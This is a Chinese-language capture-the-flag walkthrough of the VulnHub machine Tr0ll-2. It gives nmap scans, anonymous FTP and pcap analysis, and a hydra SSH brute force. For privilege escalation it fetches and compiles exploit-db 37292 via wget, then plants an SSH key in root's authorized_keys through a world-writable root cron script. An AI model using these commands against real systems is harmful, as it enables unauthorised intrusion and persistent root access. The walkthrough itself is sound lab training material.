VulnHub靶机4-Tr0ll-2

信息收集

攻击机kali:192.168.182.128

主机发现

1
nmap -sP 192.168.182.0/24

image-20210515003008771

靶机IP:192.168.182.129

端口扫描

1
nmap -sS -sV -A -T4 -p- 192.168.182.129

开放的端口有:21、22、80

image-20210515003224200

1
2
3
4
5
6
7
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret

1/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]

FTP存在匿名登陆,80端口存在robots.txt /secret目录

漏洞利用

FTP匿名登陆

登陆:

image-20210515003932100

发现lol.pacp文件,下载:

image-20210515004230968

下载后分析pacp文件:

image-20210515004956100

过程为传输文件。

追踪TCP流发现secret_stuff.txt:

image-20210515004521870

image-20210515004650853

1
2
3
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

网站信息收集

根据robots.txt 找到secret/目录,存在图片下载进行分析:

image-20210526174536639

image-20210515005308043

图片分析后没有隐写,继续收集信息,访问流量包中得到的路径:

image-20210526174832007

下载roflmao分析文件:

image-20210526175035939

发现字符串:Find address 0x0856BF to proceed

继续访问路径 0x0856BF:

image-20210526175140792

image-20210526175217389

image-20210526175232340

得到用户名和密码。

爆破SSH

利用得到的用户名密码爆破SSH

1
hydra -l which_one_lol.txt -p Pass.txt 192.168.182.129 ssh

image-20210526175806649

得到用户名密码 :

1
login: overflow   password: Pass.txt

登录SSH:

1
ssh overflow@192.168.182.129

image-20210526180120134

成功登陆SSH,查看权限:

image-20210526180428830

需要提权。

权限提升

首先查看内核版本看看能不能内核提权:

image-20210526180547651

ubuntu 14.04.1 内核3.13

创建一个tty:

1
python -c "import pty;pty.spawn('/bin/bash')"

kali本地搜索提权EXP:

1
searchsploit ubuntu 14.04

image-20210526181556282

发现37292符合,利用37292提权,

1
2
3
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./  
ls
python3 -m http.server 8000

image-20210526182307446

1
2
3
4
5
6
7
python -c "import pty;pty.spawn('/bin/bash')"
cd /tmp
wget http://192.168.182.128:8000/37292.c
ls
gcc 37292.c -o vvv
./vvv
whoami

image-20210526182505860

靶机会遇到自动断开连接的情况。

image-20210526182750186

其他思路

思路正来源于会自动断开SSH连接,猜测开启了计划任务,查看日志:

1
cat /var/log/cronlog

image-20210526183401119

可见存在一个cleaner.py,继续查看:

1
2
cd /lib/log
cat /lib/log/cleaner.py

image-20210526183536121

发现计划任务是root运行,并且777权限,那么就可以利用这个提权

提权方法

使用ssh-keygen 生成SSH公钥认证所需的公钥和私钥文件:

image-20210526184137161

查看公钥:

image-20210526185242834

将公钥写入计划任务文件:

1
2
3
4
5
6
7
#!/usr/bin/env python
import os
import sys
try:
os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5yozwPnY/4acmCYBreT0ZLvb9hbQLFYn0+CgASxmZAw9h7whEy13ltRJdf7Ma9oF8DQDyejBNClviR882ySjvHJfzfLJt5Yw4pnBw2hehlNS11DA9DB8qvYUodKDqxlHHQ7FJRiN6zSCG7qpuMgfmXYUGTYUcj9l9itlpac+uI/RRBK97fRL6dxaCRtBNx7IFsH0G+xtXzzb/96iUlosnWOmtOR6XVHqfqfO6VSeRpZ85AgZ1f2AL5uQdUzm6URsIG5u7GiQL+3uk/jBQpfhhhavpTYTVseaxwxzU56/KSILSwexMbRtUnW+LByJ8rk50VPo5ntUPIi+NvlkVM04SUNM4NgczD71UyxzGJFca4ZsnZLYODMLp/B1rOBkn0ISMr1ySBtj2cW/Dxuiv5zs/IqesSO0R2W5dRDRiKUXecDsxOEK1DCItxzg2gz4kQToKlEpLVMTdgTawEay0DGnMmr/CSXADPQZnqV9VRJw5XQmH4doxpkr9xG1tTvAB9fU= root@Virtua1" >> /root/.ssh/authorized_keys')
except:
sys.exit()

image-20210526190351979